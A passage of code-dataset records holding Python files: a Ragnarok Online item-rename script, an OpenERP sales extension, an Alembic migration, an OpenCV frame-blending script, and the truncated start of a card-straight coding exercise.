script.\n out_folder_path = make_output_folder()\n\n # Gets the list of items to rename\n rename_list = get_rename_list()\n\n # Output files\n db_path_out = out_folder_path + \"item_db.txt\"\n rename_and_write_item_db(\n rename_list=rename_list,\n db_path_in=item_db_in_dir,\n db_path_out=db_path_out,\n debug=debug_mode,\n )\n\n # Opens the new iteminfo.lua and item_db.txt in sublime text\n program_dir = r\"C:\\Program Files\\Sublime Text 3\\sublime_text.exe\" # raw string so the backslashes are not read as escapes\n sp.Popen([program_dir, item_db_in_dir])\n sp.Popen([program_dir, db_path_out])\n\n\n# List of items to rename.\ndef get_rename_list():\n return {\n 45042: \"Bat Mask\",\n 45048: \"Black Beret\",\n 45049: \"Blue Beret\",\n 45050: \"Brown Beret\",\n 45051: \"Pink Beret\",\n 45052: \"Purple Beret\",\n 45053: \"Red Beret\",\n 45054: \"White Beret\",\n 45055: \"Yellow Beret\",\n 45056: \"Butterfly Net\",\n 45059: \"Black Winter Hat\",\n 45060: \"Black Wind Milestone\",\n 45065: \"Blue Neck Tie\",\n 45066: \"Black Tailed Ribbon\",\n 45068: \"Blue Robe\",\n 45069: \"Blue Wind Milestone\",\n 45070: \"Blue Bandana Black\",\n 45071: \"Blue Bandana Brown\",\n 45072: \"Blue Bandana Green\",\n 45073: \"Blue Bandana Pink\",\n 45074: \"Blue Bandana Purple\",\n 45075: \"Blue Bandana Red\",\n 45076: \"Blue Bandana White\",\n 45077: \"Blue Bandana Yellow\",\n 45084: \"Blue Tailed Ribbon\",\n 45088: \"Brazilian Flag Hat\",\n 45089: \"Brown Winter Hat\",\n 45090: \"Brown Wind Milestone\",\n 45092: \"Brown Helm of Darkness\",\n 45093: \"Brown Neck Tie\",\n 45094: \"Brown Tailed Ribbon\",\n 45099: \"Blue Bubble Gum\",\n 45100: \"Green Bubble Gum\",\n 45101: \"Pink Bubble Gum\",\n 45125: \"Drooping Choco\",\n 45138: \"Creepy Pumpkin\",\n 45141: \"Cupcake Hat\",\n 45145: \"Deity Mask\",\n 45147: \"Deviling Backpack\",\n 45158: \"Dragoon Wings\",\n 45179: \"Dunce Hat\",\n 45183: \"Empty Eye Socket\",\n 45184: \"Enchanced Shackles\",\n 45185: \"Exodus Wing\",\n 45186: \"Lilika's Butterfly Wings\",\n 45187: \"Fairy Egg\",\n 45190: \"Black Feather Beret\",\n 45191: \"Brown Feather Beret\",\n 45192: \"Green Feather Beret\",\n 45193: \"Pink Feather Beret\",\n 45194: \"Purple Feather Beret\",\n 45195: \"White Feather Beret\",\n 45196: \"Yellow Feather Beret\",\n 45197: \"Feather Mask\",\n 45198: \"Female Smith Pack\",\n 
45199: \"Female Super Novice Pack\",\n 45200: \"Ghost of Fallen Bishop\",\n 45202: \"Final Sacrifice Hat\",\n 45207: \"Flower Earrings\",\n 45210: \"Flying Angeling\",\n 45211: \"Freya Crescent's Hat\",\n 45213: \"Frog Hood\",\n 45215: \"Fur Mantle\",\n 45216: \"Black Gangster Scarf\",\n 45217: \"Blue Gangster Scarf\",\n 45218: \"Brown Gangster Scarf\",\n 45219: \"Green Gangster Scarf\",\n 45220: \"Pink Gangster Scarf\",\n 45221: \"Purple Gangster Scarf\",\n 45222: \"White Gangster Scarf\",\n 45223: \"Yellow Gangster Scarf\",\n 45224: \"Gem Bracelet\",\n 45225: \"Gem Necklace\",\n 45227: \"Giga Pudding\",\n 45241: \"Gold Cup\",\n 45243: \"Gold Poring Necklace\",\n 45244: \"Green Winter Hat\",\n 45245: \"Green Wind Milestone\",\n 45246: \"Green Butterfly Wings\",\n 45248: \"Green Nature Wings\",\n 45249: \"Green Neck Tie\",\n 45252: \"Green Tailed Ribbon\",\n 45255: \"Gryphon Item\",\n 45256: \"Gryphon Hat\",\n 45259: \"Gypsy Tiara\",\n 45261: \"Halloween Box\",\n 45262: \"Hane Ribbon\",\n 45266: \"Heart Phones\",\n 45269: \"Heart Wings\",\n 45273: \"Arch Angeling Hat\",\n 45278: \"Holy Wing\",\n 45280: \"Hunny\",\n 45281: \"Huntercap Blue\",\n 45283: \"Drooping Hylozoist\",\n 45284: \"Icecream Cone\",\n 45286: \"Im Gay\",\n 45287: \"Incubus Doll\",\n 45303: \"Black Kawaii Ribbon\",\n 45304: \"Blue Kawaii Ribbon\",\n 45305: \"Brown Kawaii Ribbon\",\n 45306: \"Green Kawaii Ribbon\",\n 45307: \"Pink Kawaii Ribbon\",\n 45308: \"Purple Kawaii Ribbon\",\n 45309: \"White Kawaii Ribbon\",\n 45310: \"Yellow Kawaii Ribbon\",\n 45312: \"Kid's Letter\",\n 45314: \"Drooping Kikki\",\n 45316: \"Lala's Hat\",\n 45322: \"Light Blue Wind Milestone\",\n 45326: \"Sailor Scout's Moon Locket\",\n 45328: \"Love eRO\",\n 45331: \"Black Magic Eyes\",\n 45332: \"Blue Magic Eyes\",\n 45333: \"Brown Magic Eyes\",\n 45334: \"Green Magic Eyes\",\n 45335: \"Pink Magic Eyes\",\n 45336: \"Red Magic Eyes\",\n 45337: \"White Magic Eyes\",\n 45338: \"Yellow Magic Eyes\",\n 45340: \"Majoras Mask\",\n 45341: \"Male Smith Pack\",\n 45342: \"Male Super Novice Pack\",\n 45346: \"Metaling Party Hat\",\n 45348: \"Mini Holy Wings\",\n 45350: \"Mushroom Kingdom Crown\",\n 45354: \"Neko Cookie\",\n 45361: \"Stack of Pancakes\",\n 45366: \"Peco Peco Wing\",\n 45368: \"Phoenix Wings\",\n 45372: \"Drooping Pikachu\",\n 45374: \"Pink Butterfly Wings\",\n 45375: \"Pink Hat\",\n 45376: \"Pink Helm of Darkness\",\n 45377: \"Pink Neck Tie\",\n 45381: \"Poring Envelope\",\n 45383: \"Poring Party Hat\",\n 45385: \"Poring Rucksack\",\n 45386: \"Drooping Praetor\",\n 45389: \"Purple Wind Milestone\",\n 45390: \"Purple Butterfly Wings\",\n 45391: \"Purple Hat\",\n 45392: \"Purple Helm of Darkness\",\n 45393: \"Purple Neck Tie\",\n 45395: \"Purple Tailed Ribbon\",\n 45396: \"Shadow Arrow Quiver\",\n 45397: \"Crystal Arrow Quiver\",\n 45398: \"Earth Arrow Quiver\",\n 45399: \"Wind Arrow Quiver\",\n 45400: \"Immaterial Arrow Quiver\",\n 45401: \"Holy Arrow Quiver\",\n 45402: \"Poison Arrow Quiver\",\n 45403: \"Fire Arrow Quiver\",\n 45404: \"Rare Candy\",\n 45405: \"Randgris Helmet\",\n 45408: \"Red Winter Hat\",\n 45409: \"Black Redbonnet\",\n 45410: \"Blue Redbonnet\",\n 45411: \"Brown Redbonnet\",\n 45412: \"Green Redbonnet\",\n 45413: \"Pink Redbonnet\",\n 45414: \"Purple Redbonnet\",\n 45415: \"White Redbonnet\",\n 45416: \"Yellow Redbonnet\",\n 45419: \"Red Helm of Darkness\",\n 45420: \"Red Neck Tie\",\n 45422: \"Little Red Riding Hood\",\n 45426: \"Ribbon Wizard Hat\",\n 45430: \"Blue Romantic Flower\",\n 45431: \"Purple Romantic Flower\",\n 
45432: \"Red Romantic Flower\",\n 45437: \"Sapphire Earrings\",\n 45440: \"Sarasand Kingdom Crown \",\n 45443: \"Shedinja Halo\",\n 45444: \"Shedinja Mask\",\n 45445: \"Shedinja Wings\",\n 45446: \"Shinobi Helm\",\n 45447: \"Fang of Skoll\",\n 45453: \"Snowflake Ring\",\n 45458: \"Squatting Drops\",\n 45459: \"Squatting Marin\",\n 45460: \"Squatting Poporing\",\n 45461: \"Plumber's Stash\",\n 45472: \"Teddy Bear Ears\",\n 45473: \"Tengu Mask\",\n 45482: \"Twin Swords\",\n 45483: \"U Mad\",\n 45485: \"United Cap\",\n 45487: \"Valentines Ribbon Hat\",\n 45489: \"White Butterfly Wings\",\n 45494: \"Vote Post\",\n 45498: \"White Winter Hat\",\n 45499: \"White Wind Milestone\",\n 45501: \"White Hat\",\n 45502: \"White Helm of Darkness\",\n 45503: \"White Neck Tie\",\n 45504: \"White Tailed Ribbon\",\n 45506: \"Why So Serious\",\n 45507: \"Peco Peco Ears\",\n 45508: \"Wizard Beard\",\n 45509: \"Wooper Hat\",\n 45513: \"Yellow Winter Hat\",\n 45514: \"Yellow Wind Milestone\",\n 45515: \"Yellow Butterfly Wings\",\n 45516: \"Yellow Helm of Darkness\",\n 45517: \"Yellow Neck Tie\",\n 45518: \"Yellow Quiz Hat\",\n 45519: \"Yellow Tailed Ribbon\",\n 45564: \"2b Mask\",\n 46015: \"Level 1 Donor Token\",\n 46016: \"Level 2 Donor Token\",\n 46017: \"Mystery Headgear Envelope\",\n 46310: \"Individual Guild Package\",\n 46311: \"Guild Package 2a\",\n 46312: \"Guild Package 2b\",\n 46313: \"Guild Package 1a\",\n 51302: \"Snowbunny Pokeball\",\n 51303: \"Atroce Pokeball\",\n 51304: \"Doppelganger Pokeball\",\n 51305: \"Drake Pokeball\",\n 51306: \"Eddga Pokeball\",\n 51307: \"Gloom Under Night Pokeball\",\n 51308: \"Golden Thief Bug Pokeball\",\n 51309: \"Ifrit Pokeball\",\n 51310: \"Mistress Pokeball\",\n 51311: \"Moonlight Flower Pokeball\",\n 51312: \"Osiris Pokeball\",\n 51313: \"Pharaoh Pokeball\",\n 51314: \"Stormy Knight Pokeball\",\n 51315: \"Tao Gunka Pokeball\",\n 51316: \"Turtle General Pokeball\",\n 51317: \"Valkyrie Randgris Pokeball\",\n 51318: \"Am Mut Pokeball\",\n 51319: \"Cat O Nine Tails Pokeball\",\n 51320: \"Cecil Damon Pokeball\",\n 51321: \"Deviace Pokeball\",\n 51322: \"Eremes Guile Pokeball\",\n 51323: \"Giant Hornet Pokeball\",\n 51324: \"Howard Alt-Eisen Pokeball\",\n 51325: \"Jakk Pokeball\",\n 51326: \"Kathryne Keyron Pokeball\",\n 51327: \"Margaretha Solin Pokeball\",\n 51328: \"Mavka Pokeball\",\n 51329: \"Seyren Windsor Pokeball\",\n 51330: \"Skeleton General Pokeball\",\n 51331: \"Teddy Bear Pokeball\",\n 51332: \"Tengu Pokeball\",\n 51333: \"Zombie Master Pokeball\",\n 51334: \"Antonio Pokeball\",\n 51335: \"Christmas Jakk Pokeball\",\n 51336: \"Garden Keeper Pokeball\",\n 51337: \"Garden Watcher Pokeball\",\n 51338: \"Earth Crystal Pokeball\",\n 51339: \"Fire Crystal Pokeball\",\n 51340: \"Golden Savage Pokeball\",\n 51341: \"Water Crystal Pokeball\",\n 51342: \"Wind Crystal Pokeball\",\n }\n\n\n# Loads the local file system, else create a new one.\ndef make_output_folder():\n # Requires import os\n # Get the current file path of the script.\n script_dir = path.dirname(path.realpath(__file__))\n file_system_path = script_dir + \"/outputs/\"\n system_folder_exists = path.isdir(file_system_path)\n\n # Creates a system folder if it does not exist.\n if system_folder_exists:\n print(\"Output folder found...\")\n else:\n print(\"Initializing output folder...\")\n # creates a folder called \"build_item_info_files\" in the script directory\n makedirs(file_system_path)\n print(\"Created folder: \" + file_system_path)\n\n return(file_system_path)\n\n\n# Traveres an item_db.txt and 
gets all item_ids and item names.\ndef parse_item_names_from_item_db(db_path, debug):\n item_regex = \"^\\d{3,5},\"\n item_db = {}\n is_item = re.compile(item_regex)\n with open(file=db_path, mode=\"r\") as f:\n for line in f:\n if is_item.match(line):\n line_split = line.split(\",\")\n item_id = int(line_split[0])\n aegis_name = line_split[1]\n rathena_name = line_split[2]\n item_db[item_id] = {\n \"aegis_name\": aegis_name,\n \"rathena_name\": rathena_name\n }\n if debug:\n print(str(item_id) + \"\\t\" + aegis_name + \"\\t\" + rathena_name)\n return item_db\n\n\n# Writes out a new item_db.txt and renames the items from a list of items to rename.\ndef rename_and_write_item_db(rename_list, db_path_in, db_path_out, debug):\n f_out = open(file=db_path_out, mode=\"w\")\n\n item_regex = \"^\\d{3,5},\"\n is_item_id = re.compile(item_regex)\n with open(file=db_path_in, mode=\"r\") as f_in:\n for line in f_in:\n if is_item_id.search(line):\n line_split = line.split(\",\")\n item_id = int(line_split[0])\n if item_id in rename_list:\n # rename the item\n item_name = rename_list[item_id]\n aegis_name = item_name.replace(\" \", \" \").replace(\" \", \"_\")\n line_split[2] = item_name\n line_split[1] = aegis_name\n renamed_line = \",\".join(line_split)\n f_out.write(renamed_line)\n else:\n f_out.write(line)\n else:\n f_out.write(line)\n f_out.close()\n\n\nmain()\n","sub_path":"scripts/legacy/rename_item_db_names.py","file_name":"rename_item_db_names.py","file_ext":"py","file_size_in_byte":13319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"20868800","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# This module uses OpenERP, Open Source Management Solution Framework.\n# Copyright (C) 2014-Today BrowseInfo ()\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see \n#\n##############################################################################\nfrom openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP\nfrom datetime import datetime, date\nfrom openerp.osv import osv, fields\nfrom openerp.tools.translate import _\nfrom openerp import netsvc\n\nclass sale_order(osv.Model):\n _inherit = 'sale.order'\n\n def write(self, cr, uid, ids, vals, context=None):\n today_date = datetime.now()\n vals.update({'date_ext':today_date})\n return super(sale_order, self).write(cr, uid, ids, vals, context=context)\n\n def create(self, cr, uid, vals, context=None):\n if not vals.get('date_ext'):\n today_date = datetime.now()\n vals['date_ext'] = today_date\n return super(sale_order, self).create(cr, uid, vals, context=context)\n\n def _get_branch(self, cr, uid, context=None):\n if context is None:\n context = {}\n res_user_browse = self.pool.get('res.users').browse(cr, uid, [uid], context=context)[0]\n if res_user_browse.branch_id:\n return res_user_browse.branch_id.id\n\n _columns = {\n 'branch_id': fields.many2one('res.branch', 'Branch', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}),\n 'date_ext':fields.date(\"Modified Date\", readonly=True),\n 'exchange_rate': fields.float('Exchange Rate', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}),\n }\n _order = \"date_ext\"\n\n _defaults = {\n 'branch_id': _get_branch,\n }\n \n def _prepare_order_line_move(self, cr, uid, order, line, picking_id, date_planned, context=None):\n location_id = order.shop_id.warehouse_id.lot_stock_id.id\n output_id = order.shop_id.warehouse_id.lot_output_id.id\n return {\n 'name': line.name,\n 'picking_id': picking_id,\n 'product_id': line.product_id.id,\n 'date': date_planned,\n 'date_expected': date_planned,\n 'product_qty': line.product_uom_qty,\n 'product_uom': line.product_uom.id,\n 'product_uos_qty': (line.product_uos and line.product_uos_qty) or line.product_uom_qty,\n 'product_uos': (line.product_uos and line.product_uos.id)\\\n or line.product_uom.id,\n 'product_packaging': line.product_packaging.id,\n 'partner_id': line.address_allotment_id.id or order.partner_shipping_id.id,\n 'location_id': location_id,\n 'location_dest_id': output_id,\n 'sale_line_id': line.id,\n 'tracking_id': False,\n 'state': 'draft',\n #'state': 'waiting',\n 'company_id': order.company_id.id,\n 'price_unit': line.product_id.standard_price or 0.0,\n 'branch_id': order.branch_id.id or False\n }\n \n def _prepare_order_picking(self, cr, uid, order, context=None):\n result = super(sale_order, self)._prepare_order_picking(cr, uid, order, context=context)\n result.update({'branch_id': order.branch_id.id})\n return result\n\n def _prepare_order_line_procurement(self, cr, uid, order, line, move_id, date_planned, context=None):\n result = super(sale_order, self)._prepare_order_line_procurement(cr, uid, order, line, move_id, date_planned, context=context)\n result.update({'branch_id': order.branch_id.id})\n return result\n\nsale_order()\n\nclass sale_order_line_make_invoice(osv.osv_memory):\n _inherit= 'sale.order.line.make.invoice'\n \n def make_invoices(self, cr, uid, ids, context=None):\n \"\"\"\n To make invoices.\n\n @param self: The object pointer.\n @param cr: A database cursor\n @param uid: ID of the user currently logged in\n @param ids: the ID or list of IDs\n @param context: A standard dictionary\n\n @return: A dictionary which of fields with values.\n\n 
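One invoice is created per sale order from the grouped invoiceable lines; each invoice is linked back to its order through the sale_order_invoice_rel table.\n\n 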
\"\"\"\n if context is None: context = {}\n res = False\n invoices = {}\n\n #TODO: merge with sale.py/make_invoice\n def make_invoice(order, lines):\n \"\"\"\n To make invoices.\n\n @param order:\n @param lines:\n\n @return:\n\n \"\"\"\n a = order.partner_id.property_account_receivable.id\n if order.partner_id and order.partner_id.property_payment_term.id:\n pay_term = order.partner_id.property_payment_term.id\n else:\n pay_term = False\n inv = {\n 'name': order.client_order_ref or '',\n 'origin': order.name,\n 'type': 'out_invoice',\n 'reference': \"P%dSO%d\" % (order.partner_id.id, order.id),\n 'account_id': a,\n 'partner_id': order.partner_invoice_id.id,\n 'invoice_line': [(6, 0, lines)],\n 'currency_id' : order.pricelist_id.currency_id.id,\n 'comment': order.note,\n 'payment_term': pay_term,\n 'fiscal_position': order.fiscal_position.id or order.partner_id.property_account_position.id,\n 'user_id': order.user_id and order.user_id.id or False,\n 'company_id': order.company_id and order.company_id.id or False,\n 'date_invoice': fields.date.today(),\n 'branch_id': order.branch_id.id or False,\n \t'custom_invoice_no': order.invoice_no or '',\n 'discount_method': order.discount_method,\n 'discount_amount': order.discount_amount or 0.0,\n }\n inv_id = self.pool.get('account.invoice').create(cr, uid, inv)\n return inv_id\n\n sales_order_line_obj = self.pool.get('sale.order.line')\n sales_order_obj = self.pool.get('sale.order')\n wf_service = netsvc.LocalService('workflow')\n for line in sales_order_line_obj.browse(cr, uid, context.get('active_ids', []), context=context):\n if (not line.invoiced) and (line.state not in ('draft', 'cancel')):\n if not line.order_id in invoices:\n invoices[line.order_id] = []\n line_id = sales_order_line_obj.invoice_line_create(cr, uid, [line.id])\n for lid in line_id:\n invoices[line.order_id].append(lid)\n for order, il in invoices.items():\n res = make_invoice(order, il)\n cr.execute('INSERT INTO sale_order_invoice_rel \\\n (order_id,invoice_id) values (%s,%s)', (order.id, res))\n flag = True\n data_sale = sales_order_obj.browse(cr, uid, order.id, context=context)\n for line in data_sale.order_line:\n if not line.invoiced:\n flag = False\n break\n if flag:\n wf_service.trg_validate(uid, 'sale.order', order.id, 'manual_invoice', cr)\n\n if not invoices:\n raise osv.except_osv(_('Warning!'), _('Invoice cannot be created for this Sales Order Line due to one of the following reasons:\\n1.The state of this sales order line is either \"draft\" or \"cancel\"!\\n2.The Sales Order Line is Invoiced!'))\n if context.get('open_invoices', False):\n return self.open_invoices(cr, uid, ids, res, context=context)\n return {'type': 'ir.actions.act_window_close'}\n \nclass sale_advance_payment_inv(osv.osv_memory):\n _inherit = 'sale.advance.payment.inv'\n\n def _prepare_advance_invoice_vals(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n sale_obj = self.pool.get('sale.order')\n ir_property_obj = self.pool.get('ir.property')\n fiscal_obj = self.pool.get('account.fiscal.position')\n inv_line_obj = self.pool.get('account.invoice.line')\n wizard = self.browse(cr, uid, ids[0], context)\n sale_ids = context.get('active_ids', [])\n\n result = []\n for sale in sale_obj.browse(cr, uid, sale_ids, context=context):\n val = inv_line_obj.product_id_change(cr, uid, [], wizard.product_id.id,\n uom_id=False, partner_id=sale.partner_id.id, fposition_id=sale.fiscal_position.id)\n res = val['value']\n\n # determine and check income account\n if not wizard.product_id.id 
:\n prop = ir_property_obj.get(cr, uid,\n 'property_account_income_categ', 'product.category', context=context)\n prop_id = prop and prop.id or False\n account_id = fiscal_obj.map_account(cr, uid, sale.fiscal_position or False, prop_id)\n if not account_id:\n raise osv.except_osv(_('Configuration Error!'),\n _('There is no income account defined as global property.'))\n res['account_id'] = account_id\n if not res.get('account_id'):\n raise osv.except_osv(_('Configuration Error!'),\n _('There is no income account defined for this product: \"%s\" (id:%d).') % \\\n (wizard.product_id.name, wizard.product_id.id,))\n\n # determine invoice amount\n if wizard.amount <= 0.00:\n raise osv.except_osv(_('Incorrect Data'),\n _('The value of Advance Amount must be positive.'))\n if wizard.advance_payment_method == 'percentage':\n inv_amount = sale.amount_total * wizard.amount / 100\n if not res.get('name'):\n res['name'] = _(\"Advance of %s %%\") % (wizard.amount)\n else:\n inv_amount = wizard.amount\n if not res.get('name'):\n #TODO: should find a way to call formatLang() from rml_parse\n symbol = sale.pricelist_id.currency_id.symbol\n if sale.pricelist_id.currency_id.position == 'after':\n res['name'] = _(\"Advance of %s %s\") % (inv_amount, symbol)\n else:\n res['name'] = _(\"Advance of %s %s\") % (symbol, inv_amount)\n\n # determine taxes\n if res.get('invoice_line_tax_id'):\n res['invoice_line_tax_id'] = [(6, 0, res.get('invoice_line_tax_id'))]\n else:\n res['invoice_line_tax_id'] = False\n\n # create the invoice\n inv_line_values = {\n 'name': res.get('name'),\n 'origin': sale.name,\n 'account_id': res['account_id'],\n 'price_unit': inv_amount,\n 'quantity': wizard.qtty or 1.0,\n 'discount': False,\n 'uos_id': res.get('uos_id', False),\n 'product_id': wizard.product_id.id,\n 'invoice_line_tax_id': res.get('invoice_line_tax_id'),\n 'account_analytic_id': sale.project_id.id or False,\n }\n inv_values = {\n 'name': sale.client_order_ref or sale.name,\n 'origin': sale.name,\n 'type': 'out_invoice',\n 'reference': sale.client_order_ref or sale.name,\n 'account_id': sale.partner_id.property_account_receivable.id,\n 'partner_id': sale.partner_invoice_id.id,\n 'invoice_line': [(0, 0, inv_line_values)],\n 'currency_id': sale.pricelist_id.currency_id.id,\n 'comment': '',\n 'branch_id': sale.branch_id.id,\n 'payment_term': sale.payment_term.id,\n 'fiscal_position': sale.fiscal_position.id or sale.partner_id.property_account_position.id,\n \t'custom_invoice_no': sale.invoice_no or '',\n 'discount_method': sale.discount_method,\n 'discount_amount': sale.discount_amount or 0.0,\n\n }\n result.append((sale.id, inv_values))\n return result\n\nclass sale_order_line(osv.Model):\n _inherit = 'sale.order.line'\n\n def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=False,\n lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, exchange_rate=0, context=None):\n res_currency = self.pool.get('res.currency')\n context = context or {}\n lang = lang or context.get('lang',False)\n if not partner_id:\n raise osv.except_osv(_('No Customer Defined!'), _('Before choosing a product,\\n select a customer in the sales form.'))\n warning = {}\n product_uom_obj = self.pool.get('product.uom')\n partner_obj = self.pool.get('res.partner')\n product_obj = self.pool.get('product.product')\n product_pricelist = self.pool.get('product.pricelist')\n\n context = {'lang': lang, 'partner_id': partner_id}\n if partner_id:\n lang 
= partner_obj.browse(cr, uid, partner_id).lang\n context_partner = {'lang': lang, 'partner_id': partner_id}\n\n if not product:\n return {'value': {'th_weight': 0,\n 'product_uos_qty': qty}, 'domain': {'product_uom': [],\n 'product_uos': []}}\n if not date_order:\n date_order = datetime.now().strftime(DEFAULT_SERVER_DATE_FORMAT) # the original called time.strftime, but 'time' is never imported in this module\n\n result = {}\n warning_msgs = ''\n product_obj = product_obj.browse(cr, uid, product, context=context_partner)\n\n uom2 = False\n price_list = self.pool.get('product.pricelist').browse(cr, uid, pricelist)\n if uom:\n uom2 = product_uom_obj.browse(cr, uid, uom)\n if product_obj.uom_id.category_id.id != uom2.category_id.id:\n uom = False\n if uos:\n if product_obj.uos_id:\n uos2 = product_uom_obj.browse(cr, uid, uos)\n if product_obj.uos_id.category_id.id != uos2.category_id.id:\n uos = False\n else:\n uos = False\n fpos = fiscal_position and self.pool.get('account.fiscal.position').browse(cr, uid, fiscal_position) or False\n if update_tax: # only the quantity has changed\n result['tax_id'] = self.pool.get('account.fiscal.position').map_tax(cr, uid, fpos, product_obj.taxes_id)\n\n if not flag:\n result['name'] = self.pool.get('product.product').name_get(cr, uid, [product_obj.id], context=context_partner)[0][1]\n if product_obj.description_sale:\n result['name'] += '\\n'+product_obj.description_sale\n domain = {}\n if (not uom) and (not uos):\n result['product_uom'] = product_obj.uom_id.id\n if product_obj.uos_id:\n result['product_uos'] = product_obj.uos_id.id\n result['product_uos_qty'] = qty * product_obj.uos_coeff\n uos_category_id = product_obj.uos_id.category_id.id\n else:\n result['product_uos'] = False\n result['product_uos_qty'] = qty\n uos_category_id = False\n result['th_weight'] = qty * product_obj.weight\n domain = {'product_uom':\n [('category_id', '=', product_obj.uom_id.category_id.id)],\n 'product_uos':\n [('category_id', '=', uos_category_id)]}\n elif uos and not uom: # only happens if uom is False\n result['product_uom'] = product_obj.uom_id and product_obj.uom_id.id\n result['product_uom_qty'] = qty_uos / product_obj.uos_coeff\n result['th_weight'] = result['product_uom_qty'] * product_obj.weight\n elif uom: # whether uos is set or not\n default_uom = product_obj.uom_id and product_obj.uom_id.id\n q = product_uom_obj._compute_qty(cr, uid, uom, qty, default_uom)\n if product_obj.uos_id:\n result['product_uos'] = product_obj.uos_id.id\n result['product_uos_qty'] = qty * product_obj.uos_coeff\n else:\n result['product_uos'] = False\n result['product_uos_qty'] = qty\n result['th_weight'] = q * product_obj.weight # Round the quantity up\n\n if not uom2:\n uom2 = product_obj.uom_id\n # get unit price\n if not pricelist:\n warn_msg = _('You have to select a pricelist or a customer in the sales form !\\n'\n 'Please set one before choosing a product.')\n warning_msgs += _(\"No Pricelist ! 
: \") + warn_msg +\"\\n\\n\"\n else:\n res_user_obj = self.pool.get('res.users').browse(cr, uid, [uid])[0]\n if price_list.currency_id.id != res_user_obj.company_id.currency_id.id:\n if exchange_rate == 0:\n exchange_rate = 1\n price = product_obj.list_price * exchange_rate\n result.update({'price_unit': price})\n else:\n price = self.pool.get('product.pricelist').price_get(cr, uid, [pricelist],\n product, qty or 1.0, partner_id, {\n 'uom': uom or result.get('product_uom'),\n 'date': date_order,\n })[pricelist]\n if price is False:\n warn_msg = _(\"Cannot find a pricelist line matching this product and quantity.\\n\"\n \"You have to change either the product, the quantity or the pricelist.\")\n\n warning_msgs += _(\"No valid pricelist line found ! :\") + warn_msg +\"\\n\\n\"\n else: \n result.update({'price_unit': price})\n if warning_msgs:\n warning = {\n 'title': _('Configuration Error!'),\n 'message' : warning_msgs\n }\n \n result['type'] = product_obj.procure_method\n result['cost'] = product_obj.standard_price * price_list.currency_id.rate_silent\n\n return {'value': result, 'domain': domain, 'warning': warning}\n\nsale_order_line()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"sale_extended/sale_extended.py","file_name":"sale_extended.py","file_ext":"py","file_size_in_byte":19133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"597826737","text":"\"\"\"empty message\n\nRevision ID: e49f2de9ab0e\nRevises: 75f20a900418\nCreate Date: 2020-01-23 16:30:55.509180\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e49f2de9ab0e'\ndown_revision = '75f20a900418'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.String(length=32), nullable=False),\n sa.Column('pw', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n mysql_collate='utf8_general_ci'\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('user')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/e49f2de9ab0e_.py","file_name":"e49f2de9ab0e_.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"237795530","text":"import cv2\nimport os\nimport numpy as np\n# from PIL import Image\n\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\npath1 = '/home/rain/shipin/input/'\npath2 = '/home/rain/shipin/png_out/'\nlength = len(os.listdir(path2))\n\nvideoWriter = cv2.VideoWriter(\n '/home/rain/shipin/MVI_1983光流4.avi', fourcc, 8, (960, 540))\nfor i in range(1, length + 1):\n img1 = cv2.imread(path1 + str(i) + '.png')\n img2 = cv2.imread(path2 + str(i) + '.png')\n lower = np.array([250, 250, 250])\n upper = np.array([256, 256, 256])\n mask = cv2.inRange(img2, lower, upper)\n\n img_mask = np.copy(img2)\n img_mask[mask != 0] = [0, 0, 0]\n img2 = cv2.resize(img_mask, (960, 540))\n # cv2.imshow('img', img2)\n # cv2.waitKey(1)\n # Blend the two frames; the weight arguments control transparency: a weight of 1 keeps\n # img1 fully opaque, while e.g. 0.5 would overlay the other image half-transparently.\n img_mix = cv2.addWeighted(img1, 1, img2, 0.6, 0)\n videoWriter.write(img_mix)\n print(str(i) + '.png' + ' done!')\nvideoWriter.release()\n","sub_path":"hc.py","file_name":"hc.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"111120140","text":"\"\"\"\nProblem description\nLL is in a great mood today because he bought a deck of playing cards and found it contains 2 big jokers and 2 small jokers (a full deck has 54 cards ^_^)... He randomly drew 5 cards, wanting to test his luck and see whether he could draw a straight; if so, he would go buy a sports lottery ticket, hehe!! \"Ace of hearts, 3 of spades, small joker, big joker, 5 of diamonds\" -- \"Oh My God!\" not a straight..... LL was unhappy. He thought about it and decided that the big/small jokers may stand for any number, with A counted as 1, J as 11, Q as 12 and K as 13. The 5 cards above can then become \"1,2,3,4,5\" (with the jokers standing in for 2 and 4): \"So Lucky!\". LL decided to go buy the lottery ticket. Now you are asked to simulate this process with such a deck and tell us how LL's luck turns out: output true if the drawn cards can form a straight, otherwise output false. For convenience, you may treat the jokers as 0.\n\"\"\"\n\n\n# -*- coding:utf-8 -*-\nclass 